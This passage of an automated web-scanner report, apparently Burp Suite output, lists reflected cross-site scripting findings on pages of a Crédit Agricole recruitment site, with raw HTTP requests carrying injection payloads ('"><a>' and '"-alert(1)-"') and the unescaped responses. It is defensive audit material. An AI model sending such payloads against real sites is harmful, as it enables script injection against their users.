This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /divers_disability.php?751d7"><a>c6825584c86=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:30 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:30 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 57801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Disabil
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/divers_disability.php?751d7"><a>c6825584c86=1" />
...[SNIP]...

1.41. http://www.mycreditagricole.jobs/divers_disability.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /divers_disability.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b3cb"-alert(1)-"aefdd7a1ad8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /divers_disability.php?9b3cb"-alert(1)-"aefdd7a1ad8=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:53 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:53 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 57822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Disabil
...[SNIP]...
Agricole Recruitment Group";
var SharingBaseTitle = "Disability - Diversity - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/divers_disability.php?9b3cb"-alert(1)-"aefdd7a1ad8=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.42. http://www.mycreditagricole.jobs/divers_microfinance.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /divers_microfinance.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48f99"><a>4e5f565cbde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /divers_microfinance.php?48f99"><a>4e5f565cbde=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:35 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:35 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Microfi
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/divers_microfinance.php?48f99"><a>4e5f565cbde=1" />
...[SNIP]...

1.43. http://www.mycreditagricole.jobs/divers_microfinance.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /divers_microfinance.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4297a"-alert(1)-"dcab507ba6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /divers_microfinance.php?4297a"-alert(1)-"dcab507ba6f=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:56 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:56 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Microfi
...[SNIP]...
icole Recruitment Group";
var SharingBaseTitle = "Microfinance - Diversity - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/divers_microfinance.php?4297a"-alert(1)-"dcab507ba6f=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.44. http://www.mycreditagricole.jobs/diversity.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /diversity.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ed4"><a>2b7a560ac9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /diversity.php?17ed4"><a>2b7a560ac9b=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:27 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:27 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 55313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Diversi
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/diversity.php?17ed4"><a>2b7a560ac9b=1" />
...[SNIP]...

1.45. http://www.mycreditagricole.jobs/diversity.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /diversity.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9faa"-alert(1)-"444927dcdcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversity.php?f9faa"-alert(1)-"444927dcdcd=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:52 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:52 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 55334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Diversi
...[SNIP]...
"Diversity - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Diversity - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/diversity.php?f9faa"-alert(1)-"444927dcdcd=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.46. http://www.mycreditagricole.jobs/entities.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /entities.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae90d"><a>cca70f4caad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entities.php?ae90d"><a>cca70f4caad=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:23 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:23 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Cr..dit
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/entities.php?ae90d"><a>cca70f4caad=1" />
...[SNIP]...

1.47. http://www.mycreditagricole.jobs/entities.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /entities.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67a7a"-alert(1)-"44178014737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entities.php?67a7a"-alert(1)-"44178014737=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:43 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:43 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Cr..dit
...[SNIP]...
Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Our entities - About us - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/entities.php?67a7a"-alert(1)-"44178014737=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/images_entites/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http://ww
...[SNIP]...

1.48. http://www.mycreditagricole.jobs/etudiants.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /etudiants.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b29a"><a>7803bba0e43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /etudiants.php?9b29a"><a>7803bba0e43=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:39 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:40 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/etudiants.php?9b29a"><a>7803bba0e43=1" />
...[SNIP]...

1.49. http://www.mycreditagricole.jobs/etudiants.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /etudiants.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a65e"-alert(1)-"759dadd77ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /etudiants.php?9a65e"-alert(1)-"759dadd77ad=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:01 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:01 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Espace
...[SNIP]...
ts - Groupe Cr..dit Agricole Recrutement";
var SharingBaseTitle = "Espace Etudiants - Groupe Cr..dit Agricole Recrutement";
var SharingUrl = "http://www.recrutement.credit-agricole.com/etudiants.php?9a65e"-alert(1)-"759dadd77ad=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.50. http://www.mycreditagricole.jobs/exp_forums.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2e9"><a>c3b8a15dadd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_forums.php?4e2e9"><a>c3b8a15dadd=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:30 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:30 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 63838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_forums.php?4e2e9"><a>c3b8a15dadd=1" />
...[SNIP]...

1.51. http://www.mycreditagricole.jobs/exp_forums.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload befb5"-alert(1)-"2525d2989e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_forums.php?befb5"-alert(1)-"2525d2989e1=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:58 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:58 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 63859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
- Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Forums - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_forums.php?befb5"-alert(1)-"2525d2989e1=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.52. http://www.mycreditagricole.jobs/exp_key_figures.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26fc5"-alert(1)-"b5133ec876c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_key_figures.php?26fc5"-alert(1)-"b5133ec876c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:54 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:54 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
Agricole Recruitment Group";
var SharingBaseTitle = "Key figures - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_key_figures.php?26fc5"-alert(1)-"b5133ec876c=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.53. http://www.mycreditagricole.jobs/exp_key_figures.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7045a"><a>ce23c0ca00b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_key_figures.php?7045a"><a>ce23c0ca00b=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:29 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:29 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_key_figures.php?7045a"><a>ce23c0ca00b=1" />
...[SNIP]...

1.54. http://www.mycreditagricole.jobs/exp_requirement.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61a53"><a>70825bbfb65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exp_requirement.php?61a53"><a>70825bbfb65=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:15 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:15 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Join us
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/exp_requirement.php?61a53"><a>70825bbfb65=1" />
...[SNIP]...

1.55. http://www.mycreditagricole.jobs/exp_requirement.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /exp_requirement.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66666"-alert(1)-"094865254aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exp_requirement.php?66666"-alert(1)-"094865254aa=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:45 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:45 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Join us
...[SNIP]...
dit Agricole Recruitment Group";
var SharingBaseTitle = "Join us - Experienced - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/exp_requirement.php?66666"-alert(1)-"094865254aa=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

